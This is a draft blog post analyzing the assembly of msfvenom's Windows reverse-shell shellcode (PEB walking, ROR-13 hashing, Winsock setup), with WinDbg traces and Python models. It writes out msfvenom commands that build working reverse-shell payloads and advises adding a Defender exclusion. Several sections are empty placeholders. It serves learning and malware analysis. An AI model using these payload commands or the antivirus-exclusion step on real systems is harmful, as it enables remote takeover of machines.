Analyzing msfvenom's reverse shell payload - Windows

This is my attempt at breaking down the shellcode used in msfvenom's reverse shell payload on Windows, and exploring how it works.

Add Introduction Here

Prerequisites

Shellcode

As the title mentions, I used msfvenom to generate the shellcode I was going to decipher. msfvenom is a free tool included in the Metasploit Framework. I also used the objdump command in Linux to disassemble the shellcode into assembly instructions.

# generate windows reverse shell code in binary format
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f raw -o revshell.bin

# disassemble the shellcode into human-readable assembly code
objdump -D -b binary -M intel -m i386:x86-64 revshell.bin

Since anyone can use msfvenom, I am not going to include the shellcode. Instead I will explain snippets as I go. Feel free to generate the shellcode and follow along if you’d like.

Windows 11 VM & WinDbg

I’ve set up a Windows 11 VM to run the shellcode in a debugger. Since Defender has signatures for stock msfvenom payloads, you’ll need to add an exclusion in Defender for the directory where you plan to store the msfvenom executable. Otherwise, Defender will flag and delete the executable the second it touches the disk.

While deciphering the shellcode, I used WinDbg to step through some of the instructions. This helped me better understand how the shellcode works. To generate a working payload to run in WinDbg, I had msfvenom create an executable instead of outputting the payload in raw binary format (as I did in the Shellcode section).

# generate windows reverse shell executable to run in WinDbg
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f exe -o revshell.exe

Patience

Lastly, I am NOT an expert at shellcoding. With that being said, I expected this to be an easy task and was quickly humbled! There were a lot of times where I almost gave up because I had no idea what I was doing. But with a lot of patience (and a little bit of help from Claude :)), I was able to see this project to completion.

Shellcode Analysis

Add Content Here

Part 1 - Initial Setup

0:      fc                      cld
1:      48 83 e4 f0             and    rsp,0xfffffffffffffff0
5:      e8 cc 00 00 00          call   0xd6

These first few instructions set up the shellcode for execution. The first instruction, cld, clears the direction flag (DF) in RFLAGS, setting it to 0. With DF cleared, string instructions such as lods (used in the hashing loop in Part 2) step forward through memory by incrementing rsi.

The next instruction aligns the stack to a 16-byte boundary by clearing the low four bits of rsp. The Windows x64 calling convention expects this alignment at the point of a call, and API functions that use aligned SSE instructions can crash without it.

The final instruction pushes the address of the next instruction (0xa) onto the stack and sets the instruction pointer to 0xd6. I will go over the importance of this instruction more in Part 4.
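To make the arithmetic in Part 1 concrete, here is a minimal Python sketch of the stack alignment and of how the target of an `e8` near call is derived from its encoded bytes. The helper names and the sample rsp value 0x15ff58 are my own, chosen only for illustration; the call bytes are the ones shown in the listing.

```python
def align16(rsp: int) -> int:
    """Model `and rsp, 0xfffffffffffffff0`: clear the low four bits of rsp."""
    return rsp & 0xFFFFFFFFFFFFFFF0


def call_target(offset: int, encoded: bytes) -> int:
    """Return the target of an `e8 rel32` near call located at `offset`."""
    if len(encoded) != 5 or encoded[0] != 0xE8:
        raise ValueError("expected a 5-byte e8 rel32 call")
    # The 32-bit displacement is little-endian, signed, and relative to the
    # address of the instruction that follows the call.
    rel32 = int.from_bytes(encoded[1:], "little", signed=True)
    return (offset + len(encoded) + rel32) & 0xFFFFFFFFFFFFFFFF


# Hypothetical misaligned stack pointer, rounded down to a multiple of 16.
print(hex(align16(0x15FF58)))  # 0x15ff50

# The call at offset 0x5 from the listing: 0x5 + 5 + 0xcc = 0xd6.
print(hex(call_target(0x5, bytes.fromhex("e8cc000000"))))  # 0xd6
```

The same `call_target` helper can be pointed at any other `e8` call in the objdump output to double-check where it lands.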

Part 2 - PEB Walking & API Hashing

This part covers the instructions from 0xa to 0xc5. Rather than paste the whole section here, I will include snippets where necessary to keep things neat and organized.

   a:   41 51                   push   r9
   c:   41 50                   push   r8
   e:   52                      push   rdx
   f:   51                      push   rcx
  10:   56                      push   rsi
  11:   48 31 d2                xor    rdx,rdx 

These first few instructions push the values of the r9, r8, rdx, rcx, and rsi registers onto the stack so that they can be restored to their previous state after completion. The last instruction zeroes out rdx.

  14:   65 48 8b 52 60          mov    rdx,QWORD PTR gs:[rdx+0x60]
  19:   48 8b 52 18             mov    rdx,QWORD PTR [rdx+0x18]
  1d:   48 8b 52 20             mov    rdx,QWORD PTR [rdx+0x20]
  21:   48 8b 72 50             mov    rsi,QWORD PTR [rdx+0x50]
  25:   48 0f b7 4a 4a          movzx  rcx,WORD PTR [rdx+0x4a]

The first instruction reads the pointer to the process’s PEB (Process Environment Block) into the rdx register. Because rdx was just zeroed, gs:[rdx+0x60] is simply gs:[0x60], the PEB pointer stored in the thread’s TEB (Thread Environment Block). The PEB stores information about the running process, such as its image base address, command line args, and loaded modules (DLLs).

The next two instructions follow PEB -> PEB_LDR_DATA -> InMemoryOrderModuleList, leaving rdx pointing at the first entry in the list of loaded modules. The fourth instruction then moves the pointer to that module’s name buffer (a UTF-16 string) into the rsi register. This is referred to as PEB walking, a technique commonly used by malicious processes to covertly look up functions in memory.

The last instruction loads the 16-bit length field of the DLL name (the MaximumLength member of its UNICODE_STRING, measured in bytes) into the rcx register, zero-extended. This value is used as the counter for our hashing loop.
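The displacements 0x50 and 0x4a make more sense once you remember that rdx points at the InMemoryOrderLinks field inside a module entry, not at the start of the entry. The sketch below models the first few fields of the x64 LDR_DATA_TABLE_ENTRY with ctypes and derives both displacements. The field layout is an assumption based on commonly published definitions of this partly undocumented structure (the kind of output `dt ntdll!_LDR_DATA_TABLE_ENTRY` gives in WinDbg), and it assumes a 64-bit Python.

```python
import ctypes


class LIST_ENTRY(ctypes.Structure):
    _fields_ = [("Flink", ctypes.c_uint64), ("Blink", ctypes.c_uint64)]


class UNICODE_STRING(ctypes.Structure):
    _fields_ = [
        ("Length", ctypes.c_uint16),         # bytes in use, excluding terminator
        ("MaximumLength", ctypes.c_uint16),  # bytes allocated for Buffer
        ("Buffer", ctypes.c_uint64),         # pointer to UTF-16 characters
    ]


class LDR_DATA_TABLE_ENTRY(ctypes.Structure):
    # Only the leading fields are modeled; the real structure continues.
    _fields_ = [
        ("InLoadOrderLinks", LIST_ENTRY),
        ("InMemoryOrderLinks", LIST_ENTRY),
        ("InInitializationOrderLinks", LIST_ENTRY),
        ("DllBase", ctypes.c_uint64),
        ("EntryPoint", ctypes.c_uint64),
        ("SizeOfImage", ctypes.c_uint32),
        ("FullDllName", UNICODE_STRING),
        ("BaseDllName", UNICODE_STRING),
    ]


# rdx holds the address of InMemoryOrderLinks, so every displacement in the
# shellcode is relative to that field rather than to the start of the entry.
links_off = LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.offset
name_off = LDR_DATA_TABLE_ENTRY.BaseDllName.offset

buffer_disp = name_off + UNICODE_STRING.Buffer.offset - links_off
maxlen_disp = name_off + UNICODE_STRING.MaximumLength.offset - links_off

print(hex(buffer_disp), hex(maxlen_disp))  # 0x50 0x4a
```

Under this layout, [rdx+0x50] is BaseDllName.Buffer and [rdx+0x4a] is BaseDllName.MaximumLength, which matches the two loads at 0x21 and 0x25.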

  2a:   4d 31 c9                xor    r9,r9
  2d:   48 31 c0                xor    rax,rax
  30:   ac                      lods   al,BYTE PTR [rsi]
  31:   3c 61                   cmp    al,0x61
  33:   7c 02                   jl     0x37
  35:   2c 20                   sub    al,0x20
  37:   41 c1 c9 0d             ror    r9d,0xd
  3b:   41 01 c1                add    r9d,eax
  3e:   e2 ed                   loop   0x2d

The first two instructions zero out the r9 and rax registers. From there, the lods instruction loads the next byte from the address held in rsi into the al register (the lowest 8 bits of rax) and automatically advances rsi to the following byte, since the direction flag was cleared in Part 1. Because the name is stored as UTF-16, every other byte read for an ASCII name is 0x00.

Instructions 0x31 to 0x35 check whether the byte in al is 0x61 ('a') or higher, which is treated as a lower-case letter. If so, 0x20 is subtracted from it to make the letter upper-case.

Afterwards, ror rotates the 32-bit value in r9d (the lower half of r9) to the right by 0xd (dec: 13) bits, then adds eax (the byte that was just loaded from the name buffer) to the rotated value.

The loop instruction decrements rcx and jumps back to 0x2d until rcx reaches zero, at which point the end of the DLL name buffer has been reached. This technique is referred to as ROR-13 hashing. It is used to avoid storing library and function names as plain strings within shellcode, making it harder for AV/EDR solutions to detect and signature common functions used in malware.

The following is a run-through of what this hashing loop looks like from within WinDbg:

# set a breakpoint for 0x2d
bp 00000001`4000502d

# print r9 register then continue until next breakpoint (start of hash loop)
r r9
g

# cleaned-up output
0:
r9=0000000000000000
1:
r9=0000000000000052
2:
r9=0000000002900000
...
24:
r9=000000005fa59484
25:
r9=00000000a422fd2c
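The loop can also be reproduced outside the debugger. Below is a minimal Python sketch of the hashing loop at 0x2d to 0x3e. It assumes the module being hashed is named "revshell.exe" (inferred from the module name in the WinDbg output) and that the name is stored as UTF-16LE with a null terminator; the function names are my own.

```python
def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`, like `ror r9d, imm8`."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def hash_states(buffer: bytes):
    """Yield r9d after each byte, mirroring the loop at 0x2d-0x3e."""
    r9 = 0
    for al in buffer:
        # cmp al,0x61 / jl 0x37: jl is a signed compare, so only bytes in
        # 0x61..0x7f fall through to the subtraction (no check against 'z').
        if 0x61 <= al < 0x80:
            al -= 0x20                    # sub al,0x20
        r9 = ror32(r9, 13)                # ror r9d,0xd
        r9 = (r9 + al) & 0xFFFFFFFF       # add r9d,eax
        yield r9


# Assumption: the first module in the list is the executable itself.
name = "revshell.exe\0".encode("utf-16-le")
states = list(hash_states(name))

print(f"{states[0]:08x}")  # 00000052
print(f"{states[1]:08x}")  # 02900000
```

The first two values line up with entries 1 and 2 of the trace above: 'r' (0x72) is upper-cased to 0x52, and the zero high byte of the UTF-16 character then only rotates the hash. The last two trace entries are consistent with this as well, since `ror32(0x5fa59484, 13)` gives 0xa422fd2c.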

Part 3 - Export Table Walking

Part 4 - Connect to Attacker Machine (via Winsock)

5:      e8 cc 00 00 00          call   0xd6
a:      41 51                   push   r9
...
d6:     5d                      pop    rbp
d7:     49 be 77 73 32 5f 33    movabs r14,0x32335f327377
de:     32 00 00 
e1:     41 56                   push   r14
e3:     49 89 e6                mov    r14,rsp
e6:     48 81 ec a0 01 00 00    sub    rsp,0x1a0
ed:     49 89 e5                mov    r13,rsp
f0:     49 bc 02 00 11 5c 7f    movabs r12,0x100007f5c110002
f7:     00 00 01 
fa:     41 54                   push   r12
fc:     49 89 e4                mov    r12,rsp                
ff:     4c 89 f1                mov    rcx,r14
102:    41 ba 4c 77 26 07       mov    r10d,0x726774c
108:    ff d5                   call   rbp

I’ve included the instructions at 0x5 and 0xa, along with the code at 0xd6, to explain what is occurring here. The call instruction at 0x5 does two things: 1) it takes the address of the next instruction, 0xa, and pushes it onto the stack, and 2) it sets the instruction pointer to 0xd6.

After this, the pop instruction at 0xd6 takes the address previously pushed to the stack, 0xa, and moves it into the RBP register. Since 0xa is where the lookup routine from Part 2 begins, RBP now acts as a pointer to that routine, and the shellcode can invoke it with call rbp, as it does at 0x108.

This can all be verified by stepping through our executable in WinDbg. Note that in the session below the call lands at revshell+0x50ca (offset 0xca) rather than 0xd6, but the mechanics are the same:

######################################################################
# Set breakpoint to `0x5`, go, then print RIP & RBP and print stack. #
######################################################################

0:000> bp 00000001`40005005
0:000> g
Breakpoint 0 hit
0:000> r rip, rbp
rip=0000000140005005 rbp=0000000000000000
0:000> k
 # Child-SP          RetAddr              Call Site
00 00000000`0015ff50 00000000`00000000    revshell+0x5005 

####################################################################
# Step into call instruction then print RIP & RBP and print stack, #
# showing stack contains `0xa` instruction address.                #
####################################################################

0:000> t
0:000> r rip, rbp
rip=00000001400050ca rbp=0000000000000000
0:000> k
 # Child-SP          RetAddr               Call Site
00 00000000`0015ff48 00000001`4000500a     revshell+0x50ca
01 00000000`0015ff50 00000000`00000000     revshell+0x500a

###############################################################
# Step instruction then print RIP & RBP and print stack,      #
# showing stack no longer contains `0xa` instruction address, #
# but the address is now in the RBP register.                 #
###############################################################

0:000> t
0:000> r rip, rbp
rip=00000001400050cb rbp=000000014000500a
0:000> k
 # Child-SP          RetAddr               Call Site
00 00000000`0015ff50 00000000`00000000     revshell+0x50cb
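The call/pop trick in the trace above can be modeled in a few lines of Python. This is a toy sketch, not an emulator: the `Cpu` class is a hypothetical helper, it only tracks rip, rsp, rbp and a dictionary standing in for stack memory, and it takes the Child-SP column of the trace as the value of rsp.

```python
class Cpu:
    """Toy model of rip, rsp, rbp and 8-byte stack slots (illustrative only)."""

    def __init__(self, rip: int, rsp: int):
        self.rip = rip
        self.rsp = rsp
        self.rbp = 0
        self.memory = {}

    def call(self, target: int, length: int = 5) -> None:
        """Push the address of the next instruction, then jump to target."""
        self.rsp -= 8
        self.memory[self.rsp] = self.rip + length
        self.rip = target

    def pop_rbp(self) -> None:
        """Pop the top of the stack into rbp (`5d`, a one-byte instruction)."""
        self.rbp = self.memory.pop(self.rsp)
        self.rsp += 8
        self.rip += 1


# Values taken from the WinDbg session: breakpoint at the call instruction.
cpu = Cpu(rip=0x140005005, rsp=0x15FF50)

cpu.call(0x1400050CA)
print(hex(cpu.rsp), hex(cpu.memory[cpu.rsp]))    # 0x15ff48 0x14000500a

cpu.pop_rbp()
print(hex(cpu.rip), hex(cpu.rsp), hex(cpu.rbp))  # 0x1400050cb 0x15ff50 0x14000500a
```

The printed values match the three snapshots in the trace: the return address appears on the stack after the call, then disappears from the stack and shows up in RBP after the pop.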

With RBP set, the shellcode continues with the following instructions:

d7:     49 be 77 73 32 5f 33    movabs r14,0x32335f327377
de:     32 00 00 
e1:     41 56                   push   r14

These instructions move the value 0x32335f327377 (the little-endian bytes of the string “ws2_32\0”) into the R14 register and push R14 onto the stack. This string is used for loading the Winsock library (what we’ll use to connect to our attacker machine).
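The conversion is easy to check in Python, since movabs stores its immediate in little-endian byte order. The second half of this sketch applies the same idea to the r12 constant from the Part 4 listing; reading it as a sockaddr_in structure (family, port, IPv4 address) is my interpretation of the bytes rather than something confirmed above, although the result does agree with the LHOST passed to msfvenom.

```python
import socket

# movabs r14, 0x32335f327377: the immediate as it sits in memory.
lib_name = (0x32335F327377).to_bytes(8, "little")
print(lib_name)  # b'ws2_32\x00\x00'

# movabs r12, 0x100007f5c110002: assumed to be a packed sockaddr_in.
addr = (0x0100007F5C110002).to_bytes(8, "little")
family = int.from_bytes(addr[0:2], "little")  # sin_family, host byte order
port = int.from_bytes(addr[2:4], "big")       # sin_port, network byte order
ip = socket.inet_ntoa(addr[4:8])              # sin_addr, four raw bytes

print(family, port, ip)  # 2 4444 127.0.0.1
```

Family 2 is AF_INET, and 4444 is the port msfvenom falls back to when LPORT is not given on the command line.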

Part 5 - Spawn a Shell

Conclusion

This post is licensed under CC BY 4.0 by the author.